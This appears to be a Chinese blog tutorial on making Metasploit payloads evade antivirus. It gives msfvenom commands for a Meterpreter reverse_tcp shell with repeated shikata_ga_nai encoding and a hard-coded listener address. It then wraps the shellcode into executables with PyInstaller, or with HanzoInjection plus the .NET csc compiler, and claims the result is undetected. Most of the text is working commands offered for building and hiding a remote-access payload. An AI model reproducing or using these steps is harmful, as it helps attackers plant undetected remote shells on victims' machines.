方法1:

virtest的特征码定位,然后进行特征码处理进行绕过,该方法比手工进行文件分割定位更加高效快速。

特征码定位

方法2:python生成shellcode编译成exe

msf生成python 文件

msfvenom p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.2.222 e x86/shikata_ga_nai i 11 f py o shell.py

该文件生成的是32位的shellcode

-e 参数为编码 -i 为编码次数 x86可改成x64

生成py文件之后

添加内容

example

shellcode自行更改

安装pywin32

pywin32下载地址:http://99idc.jb51.net:81/201601/tools/pywin32_2.7(jb51.net).rar

pyinstall下载地址

https://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip

接着用pyinstall进行生成exe

路径不能有中文

python PyInstaller.py console onefile msf.py

32位与64位需要各自生成

方法3:生成shellcode之后用.net编译 32位64位也需要各自编译

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=  LPORT= -f raw > shellcode.raw

生成raw文件

hanzoInjection-master

HanzoInjection.exe -p shellcode.raw -o msf.cs

生成CS需要编译文件

然后使用.net自带的csc进行编译

此处推荐使用.net 4.0 32位的.net和64位的.net 目录不同

 

C:\Windows\Microsoft.NET\Framework64\v4.0.30319>csc.exe /unsafe /out:$path$\aaa.exe $path$fuck.cs

生成exe成功 即免杀

 

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注